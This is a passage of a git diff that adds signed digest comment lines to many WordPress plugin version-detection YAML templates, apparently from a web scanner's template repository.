4a0a00473045022100ac2916f526cfb8184b2fb67b3496295cd5f0554ee7ebc1881ffb18c993a87f2f022064c3c5fa539c83533ca36eecbe03122987c5727bb0faf09991d38a2154ad78a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..9f7c483ee5 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee989f0277e7887d0abd7c2245e303fef1f01fbd90e271d1cc759a23c96a9ebe02204b5707d27627158436d4f841a4a9d367b0d8eee1108e436a5ce88794a8e5c7d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..5acc9e1d2d 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066418ed3615ad26f9c809dd9905d0069c80d7d7e48e227e9a28bc4a235eae8b802201b6956684bf340f20579a916c355d78206cd60717901a9ed3c625951a458b8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..38ec8f91b4 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac36578b95d5687bc794ab64933fda9d8c80eb6ffd900f49dc3dbdda867c5053022100af01f6e6bf8d8f3f2284661ac78489ef0940cded8a041829b34d4b34aaebd2c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..af5cb35bac 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205bd41888b5090f9af1a5408d752a5ef273305bb356a2022a297cfc948b804fd4022100e4e701e44b3406daae332989d983e78cf2c247dc5b67a22f1a6f976e3e25e770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..5cfc6fb36a 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f5ec5f75c69553bfc64c4f8d5cbe76f19949e62096371e78d4aeeb9630c1ea6402206886d9387a06e90e967a3356656e32660e65eb86b4f13673726aa87dcfe4a0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..0d72d49e36 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220660af0774476724f84fa679fd2017d2596459e9559dcde6b75a9aa47d74dd9f4022100dd481033cca0ae8da25204b55b7b22945eed0c2fca563ff7667985c4b88dd681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..809237f5c0 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036b77972c7dee251d6e25ff0abb314f6e348325d57ad4bf23aef8cb35e024817022021df0d8e2525884182b898e8cd497ec04ec592d6a9b6e954a77d49ed04c2344e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..905d11b962 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205dbb1653347fb86864153815e7d0c19d636ba7b1bbcf394892c73bc1ae6de9d2022007e89944f1c871e8dd94d399340a105a49c614812282a72dc8e04efbf20eef5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..b1dc499ecd 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b93093b3c42ea7ccf5c6d65f9befe54fe36781a1d3e1cea005e50415a5355f602207cd07adc1be4e6e7191c49bb03a566299f00e14e12e8665e00f588a50cbe502c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..ca6ed62d21 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206af71ff66f99d9fb6e808127d6c7df3f34b472df97645af13a2a69542c8813f3022100a72b69cf766fb819604635c3819d3f79b224adf1f8d1d96f11dc25922cca3a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..eb18999742 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b66043df62bb6576d8bb87dc0bc5855da297ae65f89ce92fb7ad5f68cb1c24a1022054d46b984737ba1cf5e22fdd3a320a5a8b2a5b5530432f9aede317849be7ff97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..c26996b4c7 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002c1cf24dec33f8f193a11cec5f5f18c4bd5c7222c5b81ba1d351305ca6a1a7a022100aeb4e43eb289411db0684995c676579b79d8243d057fd2ab5044197ab3cc4eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..b5a1aed509 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c4677a47ad21948f7a03b80a7c9f99d4b4398fbcbfa41dedc745338a103ad215022100ffa61f3c39e41f404659b42b0a1b35b1e4fe11927a1a6fac3481b8dd153885d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..36f9f359e4 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0f18957bb8eabbf495f66913a6d19de1dd484519675f25b2e611d2b5b8f3e00022100f97743ae774265697c627738a5b088e2f853f946e5aa6365ce9019eebc765bb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..3b51607dea 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220092a8231483aae06790c1420248d5386ead2beec72293e33aab674153343c8fb02207eae756752d20100fd4c25dfda950e7a12c0bb20beff6939e8262a530aacc1d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..f317ce87fe 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a5621513883dd829341863c4c1dd79de7061cbe30e43caf1754faed4214b149b02206c88a258bc655f2ed510f70fec75d42c2e2be5930968403cb5a9d1c222bbc6ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..80bccc9a1c 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ebee108abc0370682684e26f5ef44e93bf0dac5e055fed50c4f41a4d0ba7494b022100bc3efa5d7adf5d73571891c17a603c0407a2cd1b7e94a1c3f09d25e0ea0c0aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..82985feac3 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e31ba6cef21a95c903effa838f58a8b44758bdf74c4327948bf95a27a323e3fe0220700ed292c0743151eb66af86d92ff36ce47352fe871c85929672236645437576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..2f3de46b98 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d2c7afb42705f21e61c8aff58cdf21f17fd9b3f4ff8b19b28c30079a135f99b02204caeb13087a12cc1b50f379aa0e0089a1d4eafa9c46156a85963f67f04cfd6b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..b36930e72a 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f1c567d2f6f5d5bf399dee9d1d32332ff59b37ab4e69c86fc338cf25d0697990220668af29bcdf6eaae77c4509254d56ddf69a95c36c92fc55f88105f1cfdf78684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..d3920fbb82 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aee45eb3088a28d53b344fb59bf6006227627dfe030c3d9b81f367682cedd810022077431c6fd8bea9aa8e5ef50a377db84d0418e3cd0ece3cb7f9795fe8c88afcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..fb749ac9b2 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f9dd558f40be08e42028d83577e5b9b9ad30d71c112bef7b9a45f20a63f6af99022031562fe74c96dd77be9c6ee763fe85048bfef763394c386fef99b92e1b2ac385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..17e7d5f1a8 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e1129b023cb9c7d9051d5e40177f33b09b605c030a23d22da8fe11412299a2ee02206875fac735222b817cc7e75cf14b805f5a0156c9ab627f824013ed1ed767b3bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..c620e0d5c6 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022051864edc89e0c821ffbb2d37ce65f147ce54ae476328b306382524226cb97018022100b4a4a7295ee9f5d07437e50c97f4ed8e6bfea9c3318375a44d1b212c5fe06e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..c660873526 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3987fd448473e025f661c51d9c721550c8d903fb4b0c5d7524fe837fca238d9022100d9c129ae9538cbdb5abe7005f48d76f7dd518366f1eb16b17687f9a0424d67f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..a86c3402ab 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097aab7942769d3f255ce22bac1c934d649c49a7dabbc55bd409fbd439a7b8159022100a41ecaf553f6e6ea581709c0628397e540a4ad4001825bc62ec483de6291f30d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..9a0e94220e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203a0a41b9d1c68cb3bfe8557b35c02527ff239ac533007f838821bc5774ad0604022100e6c6f70632e54c7d034ff7d623656c3a2df1073c1685f242eac2e5ad73e3a5d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..e541cc604b 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009efc23e465a4d654e640d002bcaf1fd71257b9976452e7dd9ddc87fe196871d02204a6e6ac975604f16a4c0e4105d91b0d182460d5e64c02d4bf57df39407416730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..d853f91a47 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b451e436020341331a7a9f16b099ec8d543eb0c37f46eb8a0a30d1c11c418353022006f9cbf8e2d8e882a8efbee13a373a0a903c5c55f91e9169c6e4e825216b0ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..47ce737abd 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cdc282dbc9380e38d21cefba1782ab87458beb9e643c9d4f69561a86c01444c2022100b4ab48249a80744e413cd31ce5cb7a506f55071e58c85711d9f50d083916b184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..1a875c0b96 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220269c9035dd796ad880637db3cf65adc51c7d6ed8af6a8d045024626f78d718410221009df9fefc4b902f91483e9f5e21e69549a5ff692e1082cef95a1c930c69972488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..d8e7f93397 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f1b3f3fb230131675bde854da09a3d7c54d9b3a4ba1fc30a236198f5fdba421f0220294bbd346ca26121daafabe8e400e80ea52a3ab5cb9d09e0f99608483f48164b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..46f2d731f0 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200aa75f7a526cfe2a35a2b23f38e0816f67db2301653a3b4e05060da5ffe31056022100ad4f991133543cbd6e03af334da81a6011625dbdb3b950e2bccbd0fd7dbb7e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..daf8fa2d05 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b85b96bfe5fb593c31623d25dca93754eb54d943481fe7b4bbd531a674962554022100dde70b28b9be4d00cc165c496a404d4829bf4cc7fe397aca8ea53d5233aa0dea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..6fcf451135 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022077180897560184e2ec3d81a202514e5b91fe7eb5706ee42efe63a265d0f8211c022035654a283f369f7e56713d123e3abd7afa68b1b20c11b27ec06c58ed0dd5e2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..006f65fb72 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b13c8986278d5bcb035740dc60a0bbab3fe112d69e170a85a786300cc3e03e10022100c7a49b51badf2bd45176e7bc68a14bd5478205b6ff4114d9d409a26e2d8e221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..a4d5a5a71f 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d767503db09a4887a36ff179ad6ca33117501fdde4f41904c7387d9140dfaff022100ff0b6f3ea9782ebc2a30edbc4b0af7e035220fa95e9b87234011b2cd3cb02ad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..2f373e6ef6 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bcf3c6551ee301ac90ee3c7829b809b582c91b4b87e2b4c36073d6a1e4d9f2d022100d9b25cfd2d4f23cdc6d349239fbf9505b272e159470a2d438f49bbc754e995dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..363952b34f 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec9f5ed3f3a0c6630e28e30e29789117c1580b83dcc0f44bb1801d7404a167dd022100f314b49bbf2627e6e891b3321c301d1587e9ac76e129abde95855010d51f20a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..74566a9358 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064c27a35e77cfabb75d9cdbfd98186929ce6445b2125cf7037b178cf51eb70080220397673e3a36ab642fcc3008cb20132805366fa7ecc88c46bec5982416ef51957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..0d4a75e3f8 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e0a624484fe0fa7cdfce391caff45ddf41d5994148b2f0bad64c2a7872e190a022100f3572dbcf6e00ced5860586e82f0b696b50be84961148b5be8a627cd40fde628:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..f3de01f92f 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f157880ae8e320152a415eae53b23e8f7e66b6e8871834d3dd99246990bea79702210087738a3914322b9ff7677f66474cde8a79ec293153d91e8219900e4569063fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..848332437b 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078b1c74d9c179952c50b358ab44c888806469332aa7e47c6e0cce69f87e542b202200cb3b079a97abe32dda9889eb94f62f430f99fa48141a5660a3e173695b23da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..9f56cf6d99 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200ac680be6d3608abc546c29710478cf47c73c7fa4a953424e5d79b67cfc66262022100fd455d07782c071f4a605a546350b736be7e8c5fd522aec089d20c9c45079f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..ea98d783da 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100afbdb764f4fb77423e1430884373ca9ac61ff78cdf29ea56d18e4e8a072e674f022100bde3bf72ef535a679618fa77411c0649c7bb6a6e61409804c4441571dfd4085f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..0d4f30ae93 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f9e310a3e20a8ce8e63e8c2b70465b4eece9e39bd60e5dd3f1fb99cb90a759d0220630988594e81ad4ac6b5111f60409b81f8463947174f31cb93f6c0687a1cbd9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..8a1ecfefda 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ 